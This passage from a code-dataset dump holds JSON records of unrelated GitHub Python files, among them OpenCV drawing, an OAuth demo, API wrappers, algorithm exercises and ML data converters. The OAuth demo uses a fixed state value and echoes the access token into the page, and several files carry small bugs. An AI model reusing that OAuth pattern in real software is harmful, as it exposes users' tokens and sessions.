cv.FONT_HERSHEY_COMPLEX\n x, y = position\n # move the callout up little bit.\n y = y - 20\n # how much tick line should be, \n lineThicknes = 30\n offset = int(lineThicknes / 2)\n center = int(offset / 2)\n new_pos = (x, y + center)\n lineLength = 229\n\n newThickness = int(lineThicknes * 0.7)\n \n cv.line(image, (x, y), (x+lineLength, y), ORANGE, lineThicknes)\n cv.line(image, (x, y), (x+lineLength, y), GREEN, newThickness)\n if animateOnValue is not None:\n\n cv.line(image, (x, y), (x+animateOnValue, y), WHITE, newThickness)\n # cv.line(image, (x,y-11), (x+Distance_level, y-11), (GREEN), 18)\n cv.putText(image, text, new_pos, fonts, 0.6, BLACK, 2)\n\n","repo_name":"Asadullah-Dal17/QR-detection-and-Distance-Estimation","sub_path":"betterLook.py","file_name":"betterLook.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"21"} +{"seq_id":"38668249973","text":"#!/usr/bin/env python\nimport webapp2\nimport json\nimport logging\n\nfrom httplib2 import Http\nfrom urllib import urlencode\n\nCLIENT_ID = 'YOUR_CLIENT_ID'\nCLIENT_SECRET = 'YOUR_CLIENT_SECRET'\nREDIRECT_URI = 'https://.appspot.com/'\n#REDIRECT_URI = 'http://localhost:14084/'\n\nAUTH_URL = \t\"https://accounts.google.com/o/oauth2/auth?client_id=\" + CLIENT_ID +\"&response_type=code&redirect_uri=\" + REDIRECT_URI +\"&state=mysecurestate&scope=https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/plus.me%20https://www.googleapis.com/auth/drive\"\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n code = self.request.get('code', None)\n if code is None:\n \t self.redirect(AUTH_URL)\n else:\n \t h = Http()\n \t data = dict(code=code, client_id=CLIENT_ID, client_secret=CLIENT_SECRET,redirect_uri=REDIRECT_URI,grant_type=\"authorization_code\")\n \t resp, access_content = h.request('https://accounts.google.com/o/oauth2/token', 'POST', urlencode(data))\n \t \n \t #this call gets us email info. however, decrypting the ID_TOKEN would have done it too\n \t userinfo_endpoint = 'https://www.googleapis.com/oauth2/v3/userinfo' \n \t data = json.loads(access_content)\n \t headers = {'Authorization': 'Bearer ' + data['access_token']}\n \t resp, profile_content = h.request(userinfo_endpoint, 'GET', headers=headers)\n\n \t drive_endpoint = 'https://www.googleapis.com/drive/v2/files'\n \t resp, drive_content = h.request(drive_endpoint, 'GET', headers=headers)\n \t \n \t self.response.out.write(access_content+'

'+profile_content+'

')\n\n \t driveFiles = json.loads(drive_content)\n \t for file in driveFiles['items']:\n \t \tself.response.out.write('

'+ file['title'] + '

')\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n], debug=True)\n","repo_name":"entaq/OAuth2Flows","sub_path":"ServerSide.py","file_name":"ServerSide.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"41247395156","text":"import os\nfrom dotenv import load_dotenv\nimport requests\nfrom typing import Optional, List, Tuple\n\n\nclass OMDBApi:\n\n def __init__(self):\n load_dotenv()\n self.api_key = os.getenv(\"API_KEY\")\n self.url = \"https://www.omdbapi.com\"\n\n def _images_path(self, title: str) -> Optional[Tuple[str, str, str, str]]:\n \"\"\"\n Helper function to fetch data about an image and movie from the OMDB API.\n\n Parameters:\n title (str): The movie title.\n\n Returns:\n Optional[Tuple[str, str, str, str]]: A tuple containing the image URL (poster),\n release date, runtime, and plot description.\n \"\"\"\n params = {\n \"apikey\": self.api_key,\n \"t\": title\n }\n\n response = requests.get(self.url, params=params)\n data = response.json()\n\n if response.status_code == 200 and data.get(\"Poster\"):\n # Extract release date, runtime, and plot from API data\n released = data.get(\"Released\", \"\")\n runtime = data.get(\"Runtime\", \"\")\n plot = data.get(\"Plot\", \"\")\n # Return the poster URL, release date, runtime, and plot description\n return data[\"Poster\"], released, runtime, plot\n else:\n return None, \"\", \"\", \"\"\n\n def get_movie_info(self, titles: List[str]) -> List[dict]:\n \"\"\"\n Get information about a movie from the OMDB API.\n\n Parameters:\n titles (List[str]): A list of movie titles.\n\n Returns:\n List[dict]: A list of dictionaries containing information about the movies,\n including title, poster, release date, runtime, and plot description.\n \"\"\"\n movie_info_list = []\n for title in titles:\n path, released, runtime, plot = self._images_path(title) # Extract plot from the _images_path function\n movie_info_list.append({\n \"title\": title,\n \"poster\": path,\n \"released\": released,\n \"runtime\": runtime,\n \"plot\": plot\n })\n return movie_info_list\n\n def get_posters(self, titles: List[str]) -> List[str]:\n \"\"\"\n Get image URLs (posters) for a list of movies.\n\n Parameters:\n titles (List[str]): A list of movie titles.\n\n Returns:\n List[str]: A list of image URLs (posters).\n \"\"\"\n posters = []\n released_list = [] # Create a list to store movie release years\n runtime_list = [] # Create a list to store movie runtimes\n plot_list = [] # Create a list to store movie plot descriptions\n\n for title in titles:\n path, released, runtime, plot = self._images_path(title)\n if path: # If the image doesn't exist\n posters.append(path)\n else:\n posters.append('assets//none.jpeg') # Add a placeholder image\n released_list.append(released) # Add the movie release year to the list\n runtime_list.append(runtime) # Add the movie runtime to the list\n plot_list.append(plot) # Add the movie plot description to the list\n return posters, released_list, runtime_list\n\n","repo_name":"AlexanderVeshniakov/Educational_project_11","sub_path":"src/api/omdb.py","file_name":"omdb.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40026786222","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nwith open('x_y.txt', 'r') as f: \n lines = f.readlines()\nfor line in lines: \n x, y = line.split('=')[0], line.split('=')[1]\n x, y = x.split(' '), y.split(' ')\n x = [i for i in x if i]\n y = [i for i in y if i]\n x[0] = x[0][1:]\n y[0] = y[0][1:]\n x[-1] = x[-1][:-1]\n y[-1] = y[-1][:-1]\n\n x = [float(i) for i in x if i]\n y = [float(i) for i in y if i]\n \n S=np.zeros(360, dtype='complex_')\n for i in range(360):\n for k in range(360):\n a=x[k]\n b=y[k]\n tmp = ((-2j*np.pi*i*k)) /360\n S[i] += (complex(a,b)) * np.exp(tmp)\n S[i]=S[i]/360\n G=np.zeros(360, dtype='complex_')\n xfinal=np.zeros(360)\n yfinal=np.zeros(360)\n for i in range(360):\n k=0\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=359\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=1\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=358\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=2\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=357\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=3\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=356\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=4\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=355\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n k=5\n tmp = ((2j*np.pi*i*k)) /360\n G[i]+=S[k]*np.exp(tmp)\n xfinal[i]=np.real(G[i])\n yfinal[i]=np.imag(G[i])\n\n plt.plot(x,y,color=\"red\")\n plt.show() \n plt.plot(xfinal,yfinal,color=\"green\")\n plt.show()\n\n \n \n","repo_name":"StructuredProgramming/Fourier-Transform-on-Dataset","sub_path":"FourierDescriptors.py","file_name":"FourierDescriptors.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32053440614","text":"\"\"\"Webassets configuration and handling\"\"\"\nimport os.path\n\nfrom flask import send_from_directory\nfrom flask_assets import Environment, Bundle\n# pylint: disable=no-name-in-module\nfrom pygments.formatters import HtmlFormatter\n\n\ndef _create_code_css(app):\n \"\"\"\n Creates the code.css file for code highlighting\n\n This will be used to merge all the css in one file\n \"\"\"\n filename = os.path.join(app.static_folder, 'style', 'code.css')\n with open(filename, 'w') as code_css:\n css = HtmlFormatter(style='default').get_style_defs('.codehilite')\n code_css.write(css)\n\n\ndef register_assets(app):\n \"\"\"Register Webassets in the app\"\"\"\n _create_code_css(app)\n\n assets = Environment(app)\n bundle = Bundle('style/main.less', 'style/code.css',\n filters='less,cleancss',\n output='css/main.%(version)s.css')\n assets.register('css', bundle)\n app.add_url_rule(\n '/static/fonts/bootstrap/',\n 'bootstrap_fonts',\n bootstrap_fonts)\n\n\ndef bootstrap_fonts(filename):\n \"Sends bootstrap font files\"\n # It will do: os.path.join(current_app.root_path, filename)\n return send_from_directory(\n '../node_modules/bootstrap/fonts/', filename)\n","repo_name":"graffic/javiergr","sub_path":"javiergr/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"34290595079","text":"from Environment import RandomMG\nfrom Agent import PAgent\nimport numpy as np\nimport util\nimport matplotlib.pyplot as plt\nimport os\n\n\n\nclass GameSimulator:\n def __init__(self, env, T):\n self.env = env\n self.T = T\n self.gamma = self.env.gamma\n\n eta = 0.125 / np.sqrt(self.env.A + self.env.B)\n self.P1 = PAgent(self.env.S, self.env.A, self.gamma, eta)\n self.P2 = PAgent(self.env.S, self.env.B, self.gamma, eta)\n if not os.path.exists('figure/tmp'):\n os.makedirs('figure/tmp')\n\n def simulate_full_info(self):\n print(\"=== offline solving the game ===\")\n self.env.solve(eps=0.001, max_iter=np.inf, verbose=True)\n self.P1.reset()\n self.P2.reset()\n\n for t in range(self.T): \n x = self.P1.get_policy()\n y = self.P2.get_policy()\n ry = np.einsum('sab,sb->sa', self.env.r, y) \n py = np.einsum('sabq,sb->saq', self.env.p, y)\n rx = np.einsum('sab,sa->sb', self.env.r, x)\n px = np.einsum('sabq,sa->sbq', self.env.p, x)\n self.P1.update(ry, py)\n self.P2.update(-rx, px)\n \n if t % 100 == 0: \n self._output_gap(t)\n if t % 10 == 0:\n self._output_figure(t)\n \n def _output_gap(self, t): \n x = self.P1.get_policy()\n y = self.P2.get_policy()\n gap, maxgap_state = util.MGdualGap(self.env.r, self.env.p, self.gamma, x, y, eps=0.001, max_iter=np.inf)\n print(\" t=\",t, \" gap=\", gap, \" maxgap_state=\", maxgap_state)\n \n def _output_figure(self, t): \n s = 0\n # calculate Q of the current policies\n x = self.P1.get_policy()\n xs = x[s,:]\n y = self.P2.get_policy()\n ys = y[s,:]\n\n V = util.MGVI(task='eval', r=self.env.r, p=self.env.p, gamma=self.gamma, \n x=x, y=y, eps=0.001, max_iter=np.inf)\n Q = util.Q_from_V(r=self.env.r, p=self.env.p, V=V, gamma=self.gamma)\n _, xstar, ystar, _ = util.solveGame(Q[s,:,:], eps=0.001, max_iter=np.inf, \n x_init=xs, y_init=ys)\n\n plt.figure(t)\n plt.scatter(xstar[0], ystar[0], c='r') \n plt.scatter(xs[0], ys[0], c='b')\n plt.scatter(self.env.x[s,0], self.env.y[s,0], c='g')\n plt.xlim((0,1))\n plt.ylim((0,1))\n\n plt.savefig('figure/tmp/%03d.png' % (t/10))\n plt.close(t)\n\n\n\n","repo_name":"bahh723/competitive-markov-game","sub_path":"GameSimulator.py","file_name":"GameSimulator.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1740667119","text":"# Considring you have a list with 128 names and you are doing a binary search. \n# What would be the maximum number of steps you would take to find the desired name?\n\ndef binary_search(list, item):\n low = 0 \n high = len(list) - 1\n while low <= high:\n mid = (low + high) // 2\n guess = list[mid]\n if guess == item:\n return mid\n if guess > item:\n high = mid - 1\n else: \n low = mid + 1\n return None \n\nmy_array = [None for _ in range(128)]\nmy_array = [None] * 128\n\nfor i in range(len(my_array)):\n my_array[i] = i\n\nmy_list = my_array\n\nprint (binary_search(my_list, 54))","repo_name":"londonplayer/Python","sub_path":"algorithms/excercises/binary_search_1.1.py","file_name":"binary_search_1.1.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38262928836","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom urllib2.request import urlretrieve\nimport os\n\ndef image_down(start_img, stop_img):\n for numb in range(start_img, stop_img):\n url = 'http://xkcd.com/{}/'.format(numb)\n url_get = requests.get(url)\n soup = BeautifulSoup(url_get.content, 'html.parser')\n link = soup.find('div', id='comic').find('img').get('src')\n link = link.replace('//', 'http://')\n img_name = os.path.basename(link)\n try:\n urlretrieve(link, img_name)\n except:\n # Just want images don't care about errors\n pass\n\nif __name__ == '__main__':\n start_img = 1\n stop_img = 20\n image_down(start_img, stop_img)\n","repo_name":"veyronvenom1200/code","sub_path":"python/image_download.py","file_name":"image_download.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33845679837","text":"class Solution(object):\n def findKthLargest(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n import heapq\n num_heap = nums[:k]\n heapq.heapify(num_heap)\n for n in nums[k:]:\n if num_heap[0] < n:\n heapq.heappop(num_heap)\n heapq.heappush(num_heap, n)\n\n return num_heap[0]\n\n\nif __name__ == \"__main__\":\n nums = [3, 2, 1, 5, 6, 4]\n k = 4\n print(Solution().findKthLargest(nums, k))\n","repo_name":"simplynaive/LeetCode","sub_path":"215. Kth Largest Element in an Array.py","file_name":"215. Kth Largest Element in an Array.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24601858161","text":"\"\"\"\nhttps://blog.csdn.net/qq_39686950/article/details/119153685?spm=1001.2101.3001.6650.12&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-12.no_search_link&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-12.no_search_link&utm_relevant_index=18\n\"\"\"\nimport os\nimport json\nimport cv2\nimport random\nimport time\nfrom PIL import Image\nfrom tqdm import tqdm\n\n\nif __name__ == \"__main__\":\n coco_format_save_path = 'E:\\\\pycharm-projects\\\\dataset\\\\DSMhand_smoke3\\\\coco\\\\annotations\\\\' # 要生成的标准coco格式标签所在文件夹\n yolo_format_classes_path = 'E:\\\\pycharm-projects\\\\dataset\\\\DSMhand_smoke3\\\\yolov5\\\\class_name.txt' # 类别文件,一行一个类\n yolo_format_annotation_path = 'E:\\\\pycharm-projects\\\\dataset\\\\DSMhand_smoke3\\\\yolov5\\\\labels\\\\val\\\\' # yolo格式标签所在文件夹\n img_pathDir = 'E:\\\\pycharm-projects\\\\dataset\\\\DSMhand_smoke3\\\\yolov5\\\\images\\\\val\\\\' # 图片所在文件夹\n\n with open(yolo_format_classes_path, 'r') as fr: # 打开并读取类别文件\n lines1 = fr.readlines()\n # print(lines1)\n categories = [] # 存储类别的列表\n for j, label in enumerate(lines1):\n label = label.strip()\n categories.append({'id': j + 1, 'name': label, 'supercategory': 'None'}) # 将类别信息添加到categories中\n # print(categories)\n\n write_json_context = dict() # 写入.json文件的大字典\n write_json_context['info'] = {'description': '', 'url': '', 'version': '', 'year': 2022, 'contributor': '',\n 'date_created': '2022-1-5'}\n write_json_context['licenses'] = [{'id': 1, 'name': None, 'url': None}]\n write_json_context['categories'] = categories\n write_json_context['images'] = []\n write_json_context['annotations'] = []\n\n # 接下来的代码主要添加'images'和'annotations'的key值\n imageFileList = os.listdir(img_pathDir) # 遍历该文件夹下的所有文件,并将所有文件名添加到列表中\n for i, imageFile in enumerate(tqdm(imageFileList)):\n imagePath = os.path.join(img_pathDir, imageFile) # 获取图片的绝对路径\n image = Image.open(imagePath) # 读取图片,然后获取图片的宽和高\n W, H = image.size\n\n img_context = {} # 使用一个字典存储该图片信息\n # img_name=os.path.basename(imagePath) #返回path最后的文件名。如果path以/或\\结尾,那么就会返回空值\n img_context['file_name'] = imageFile\n img_context['height'] = H\n img_context['width'] = W\n img_context['date_captured'] = '2022-1-5'\n img_context['id'] = i # 该图片的id\n img_context['license'] = 1\n img_context['color_url'] = ''\n img_context['flickr_url'] = ''\n write_json_context['images'].append(img_context) # 将该图片信息添加到'image'列表中\n\n txtFile = imageFile.split(\".\")[0] + '.txt' # 获取该图片获取的txt文件\n with open(os.path.join(yolo_format_annotation_path, txtFile), 'r') as fr:\n lines = fr.readlines() # 读取txt文件的每一行数据,lines2是一个列表,包含了一个图片的所有标注信息\n for j, line in enumerate(lines):\n bbox_dict = {} # 将每一个bounding box信息存储在该字典中\n # line = line.strip().split()\n # print(line.strip().split(' '))\n\n class_id, x, y, w, h = line.strip().split(' ') # 获取每一个标注框的详细信息\n class_id, x, y, w, h = int(class_id), float(x), float(y), float(w), float(h) # 将字符串类型转为可计算的int和float类型\n\n xmin = (x - w / 2) * W # 坐标转换\n ymin = (y - h / 2) * H\n xmax = (x + w / 2) * W\n ymax = (y + h / 2) * H\n w = w * W\n h = h * H\n\n bbox_dict['id'] = i * 10000 + j # bounding box的坐标信息\n bbox_dict['image_id'] = i\n bbox_dict['category_id'] = class_id + 1 # 注意目标类别要加一\n bbox_dict['iscrowd'] = 0\n height, width = abs(ymax - ymin), abs(xmax - xmin)\n bbox_dict['area'] = height * width\n bbox_dict['bbox'] = [xmin, ymin, w, h]\n bbox_dict['segmentation'] = [[xmin, ymin, xmax, ymin, xmax, ymax, xmin, ymax]]\n write_json_context['annotations'].append(bbox_dict) # 将每一个由字典存储的bounding box信息添加到'annotations'列表中\n\n name = os.path.join(coco_format_save_path, \"val\" + '.json')\n with open(name, 'w') as fw: # 将字典信息写入.json文件中\n json.dump(write_json_context, fw, indent=2)","repo_name":"CPFelix/nanodet","sub_path":"tools/yolov5_to_coco.py","file_name":"yolov5_to_coco.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"28801865277","text":"import sys\n\nn=int(input())\nif n < 2:\n print('No')\nelif n == 2:\n print('Yes')\nelif n % 2 == 0:\n print('No')\nelse:\n i=3\n # √nで割れなければnでも割れないため√nまでの数字で割り切れないかをチェックする\n while i * i <= n:\n if n % i == 0:\n print('No')\n sys.exit()\n i+=1\n print('Yes')\n","repo_name":"Satjopg/atcoder","sub_path":"algo/012_primality_test.py","file_name":"012_primality_test.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4121462467","text":"#!/usr/bin/env python3\nimport os\nimport re\nimport sys\nimport yaml\nimport fnmatch\nimport logging\nfrom datetime import datetime\n\n\ndef read_module(root = os.curdir):\n with open(os.path.join(root, 'ci.yml')) as fin:\n ci = yaml.safe_load(fin)\n\n return [\n module for module in ci['extends']['parameters']['Artifacts'] if module['name'] != 'azure-resourcemanager-samples'\n ]\n\ndef get_version(module: dict, version_file: str):\n module_name = '{}:{}'.format(module['groupId'], module['name'])\n with open(version_file) as fin:\n for line in fin.readlines():\n line = line.strip()\n if line and not line.startswith('#'):\n name, _, version = line.split(';')\n if name == module_name:\n return version\n\n raise KeyError('Cannot found version of {} in {}'.format(module_name, version_file))\n\ndef removeEmptyEntry(changelogContent: str):\n previous_entry_exists = False\n previous_entry_line = None\n left = changelogContent\n for line in left.split('\\n'):\n line = line.strip()\n if not line:\n continue\n if not line.startswith('### '):\n previous_entry_exists = True\n else:\n if not previous_entry_exists and previous_entry_line:\n left = re.sub(previous_entry_line + '\\s*', '', left)\n previous_entry_exists = False\n previous_entry_line = line\n # last line\n if not previous_entry_exists and previous_entry_line:\n left = re.sub('\\n{0,1}' + previous_entry_line + '\\s*', '', left)\n return left\n\ndef main():\n basedir = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), '..')\n os.chdir(basedir)\n\n version_file = '../../eng/versioning/version_client.txt'\n version_pattern = '\\n## (\\d+\\.\\d+\\.\\d+(?:-[\\w\\d\\.]+)?) \\((.*?)\\)'\n date = datetime.date(datetime.now())\n\n for module in read_module():\n filename = os.path.join(module['name'], 'CHANGELOG.md')\n\n with open(filename) as fin:\n changelog = fin.read()\n\n first_version = re.search(version_pattern, changelog)\n if not first_version:\n logging.error('Cannot read version from {}'.format(filename))\n continue\n\n left = changelog[first_version.end():]\n second_version = re.search(version_pattern, left)\n if not second_version:\n current_changelog = left if left.strip() else '\\n\\n- Migrated from previous sdk\\n'\n else:\n left = left[:second_version.start()]\n left = removeEmptyEntry(left)\n if not re.search('\\n### ', left):\n current_changelog = '\\n\\n### Other Changes\\n\\n#### Dependency Updates\\n\\n- Updated core dependency from resources.\\n'\n else:\n current_changelog = left\n\n version: str = first_version.group().replace(\n first_version.group(2), str(date)).replace(\n first_version.group(1), get_version(module, version_file))\n\n new_changelog = changelog[:first_version.start()] + version + current_changelog\n if second_version:\n new_changelog += changelog[first_version.end() + second_version.start():]\n\n with open(filename, 'w') as fout:\n fout.write(new_changelog)\n\nif __name__ == \"__main__\":\n logging.basicConfig(format = '%(asctime)s %(levelname)s %(message)s')\n main()\n","repo_name":"Azure/azure-sdk-for-java","sub_path":"sdk/resourcemanager/tools/changelog.py","file_name":"changelog.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":2081,"dataset":"github-code","pt":"21"} +{"seq_id":"42963623225","text":"i = input()\nc = 0\nlista = []\nlista2 = []\nh = 0\nwhile i != \"fim\":\n lista.append(i)\n i = input()\nwhile c < len(lista):\n g = lista[c]\n if g[0] == \"a\":\n lista2.append(g)\n c += 1\n else:\n c += 1\nwhile h < len(lista2):\n print(lista2[h])\n h += 1","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_400/ch46_2019_03_19_19_53_38_144235.py","file_name":"ch46_2019_03_19_19_53_38_144235.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35247705236","text":"def dato_en_agenda(dato,agenda):\n if es_nombre(dato):\n if dato in agenda.keys():\n return True\n else:\n return False\n elif es_numero(dato):\n if dato in agenda.values():\n return True\n else:\n return False\n return None\n\ndef dar_nombre(numero,agenda):\n for clave,valor in agenda.items():\n if valor == numero:\n return clave\n \n\ndef es_nombre(entrada):\n if entrada[0].isalpha():\n return True\n return False\n\ndef es_numero(entrada): # +34 691 27 08 67\n # Internacional\n if entrada[0] == \"+\" and len(entrada.split())> 1:\n new_entrada = entrada.replace(\" \",\"\")\n if new_entrada[1:-1].isnumeric():\n lista_split = entrada.split()\n if len(lista_split[0]) > 1 and len(lista_split[0]) <= 5:\n return True\n # España\n entrada = entrada.replace(\" \",\"\")\n\n if entrada.isnumeric() and len(entrada) == 9:\n return True\n # No valido\n return None\n\ndef filtra_x(dato,agenda):\n diccionario = dict()\n lista = list()\n for clave in agenda.keys():\n if dato in clave:\n diccionario = {clave : agenda[clave]}\n lista.append(diccionario)\n return lista\n\n \n\n\nif __name__==\"__main__\":\n agenda_telefonica = dict()\n while True:\n entrada = input('Introduce un numero de telefono un nombre o un comando: ')\n if entrada.lower() == 'adios':\n break\n elif entrada.lower() == 'listado':\n if len(agenda_telefonica) < 1:\n print(\"Aun no hay datos existentes\")\n else:\n agenda_ordenada = sorted(agenda_telefonica.items())\n print(agenda_ordenada)\n elif entrada.lower()[0:6] == 'filtra':\n entrada = entrada.split()\n if len(filtra_x(entrada[1], agenda_telefonica)) >= 1:\n print(filtra_x(entrada[1], agenda_telefonica))\n else:\n print(\"Ningun contacto\")\n elif es_nombre(entrada):\n if dato_en_agenda(entrada,agenda_telefonica):\n print(\"El numero de telefono de\",entrada,'es',agenda_telefonica[entrada])\n elif not dato_en_agenda(entrada,agenda_telefonica):\n numero_telefono = input(f'Introduce el numero de telefono para {entrada}: ')\n if es_numero(numero_telefono):\n if dato_en_agenda(numero_telefono,agenda_telefonica):\n print('Ese numero ya existe en la agenda')\n elif not dato_en_agenda(numero_telefono,agenda_telefonica):\n agenda_telefonica[entrada] = numero_telefono\n else:\n print('Numero de telefono no valido')\n \n elif es_numero(entrada):\n if dato_en_agenda(entrada,agenda_telefonica):\n print(\"El nombre dado al telefono\",entrada,'es',dar_nombre(entrada,agenda_telefonica))\n elif not dato_en_agenda(entrada,agenda_telefonica):\n nombre_telefono = input(f'Introduce el nombre para el numero {entrada}:')\n if es_nombre(nombre_telefono):\n if dato_en_agenda(nombre_telefono,agenda_telefonica):\n print('Ese numero ya existe en la agenda')\n elif not dato_en_agenda(nombre_telefono,agenda_telefonica):\n agenda_telefonica[nombre_telefono] = entrada\n else:\n print('Numero de telefono no valido')\n \n else:\n print(\"Entrada no valida\")","repo_name":"GonzaloPulido/ProgramacionCarpeta","sub_path":"Python/Relacion 5/Relacion 5_3/ej15.py","file_name":"ej15.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72705494132","text":"import numpy as np\n\nimport torch\nfrom torch.utils.data import Dataset\nimport dgl\n\n# TrackML Dataset and collate\n\ndef get_edge_indices(edges):\n edge_pairs = []\n for i, neighbors in enumerate(edges):\n for e_idx in neighbors:\n edge_pairs.append([i,e_idx])\n return edge_pairs\n\ndef get_true_edge_values(pred_edge_idx, true_edges):\n values = [0] * len(pred_edge_idx)\n for i, (src, dst) in enumerate(pred_edge_idx):\n if dst in true_edges[src]:\n values[i] = 1\n return values\n\nclass TrackML_Dataset(Dataset):\n def __init__(self, samples):\n self.samples = samples\n\n def __getitem__(self, index):\n s = self.samples[index]\n \n hits = s['hits']\n xyz = hits['xyz']\n emb = hits['emb']\n pid = torch.FloatTensor(hits['particle_id'])\n weight = torch.FloatTensor(hits['weight'])\n hits = torch.FloatTensor(np.concatenate((xyz, emb), axis=1))\n \n\n graphs = s['graphs']\n pred_edges = graphs['pred']\n loss_edges = graphs['loss']\n true_edges = graphs['true']\n \n pred_edge_idx = get_edge_indices(pred_edges)\n true_edge_idx = get_edge_indices(loss_edges)\n true_edge_values = get_true_edge_values(true_edge_idx,true_edges)\n\n # Build inference graph\n g_input = dgl.DGLGraph()\n g_input.add_nodes(len(hits))\n src, dst = tuple(zip(*pred_edge_idx))\n g_input.add_edges(src, dst)\n g_input.ndata['feat'] = hits\n g_input.ndata['pid'] = pid\n g_input.ndata['weight'] = weight\n\n # Build ground truth graph\n g_true = dgl.DGLGraph()\n g_true.add_nodes(len(hits))\n src, dst = tuple(zip(*true_edge_idx))\n g_true.add_edges(src, dst)\n g_true.edata['truth'] = torch.FloatTensor(true_edge_values)\n \n g_input.set_n_initializer(dgl.init.zero_initializer)\n g_true.set_n_initializer(dgl.init.zero_initializer)\n g_input.set_e_initializer(dgl.init.zero_initializer)\n g_true.set_e_initializer(dgl.init.zero_initializer)\n \n return g_input, g_true\n \n def __len__(self):\n return len(self.samples)\n \ndef trackml_collate(sample):\n g_input = [s[0] for s in sample]\n g_input = dgl.batch(g_input)\n\n g_true = [s[1] for s in sample]\n g_true = dgl.batch(g_true)\n\n return g_input, g_true\n\n\n\n\n\"\"\"\nTrackML scoring metric (by Sabrina Amrouche, David Rousseau, Moritz Kiehn, Ilija Vukotic)\n\"\"\"\n\nimport pandas\n\ndef _analyze_tracks(truth, submission):\n particles_nhits = truth['particle_id'].value_counts(sort=False)\n total_weight = truth['weight'].sum()\n event = pandas.merge(truth[['hit_id', 'particle_id', 'weight']],\n submission[['hit_id', 'track_id']],\n on=['hit_id'], how='left', validate='one_to_one')\n event.drop('hit_id', axis=1, inplace=True)\n event.sort_values(by=['track_id', 'particle_id'], inplace=True)\n\n\n tracks = []\n rec_track_id = -1\n rec_nhits = 0\n cur_particle_id = -1\n cur_nhits = 0\n cur_weight = 0\n maj_particle_id = -1\n maj_nhits = 0\n maj_weight = 0\n\n for hit in event.itertuples(index=False):\n if (rec_track_id != -1) and (rec_track_id != hit.track_id):\n if maj_nhits < cur_nhits:\n maj_particle_id = cur_particle_id\n maj_nhits = cur_nhits\n maj_weight = cur_weight\n tracks.append((rec_track_id, rec_nhits, maj_particle_id,\n particles_nhits[maj_particle_id], maj_nhits,\n maj_weight / total_weight))\n\n if rec_track_id != hit.track_id:\n rec_track_id = hit.track_id\n rec_nhits = 1\n cur_particle_id = hit.particle_id\n cur_nhits = 1\n cur_weight = hit.weight\n maj_particle_id = -1\n maj_nhits = 0\n maj_weights = 0\n continue\n\n rec_nhits += 1\n\n if cur_particle_id != hit.particle_id:\n if maj_nhits < cur_nhits:\n maj_particle_id = cur_particle_id\n maj_nhits = cur_nhits\n maj_weight = cur_weight\n cur_particle_id = hit.particle_id\n cur_nhits = 1\n cur_weight = hit.weight\n else:\n cur_nhits += 1\n cur_weight += hit.weight\n\n if maj_nhits < cur_nhits:\n maj_particle_id = cur_particle_id\n maj_nhits = cur_nhits\n maj_weight = cur_weight\n tracks.append((rec_track_id, rec_nhits, maj_particle_id,\n particles_nhits[maj_particle_id], maj_nhits, maj_weight / total_weight))\n\n cols = ['track_id', 'nhits',\n 'major_particle_id', 'major_particle_nhits',\n 'major_nhits', 'major_weight']\n return pandas.DataFrame.from_records(tracks, columns=cols)\n\ndef 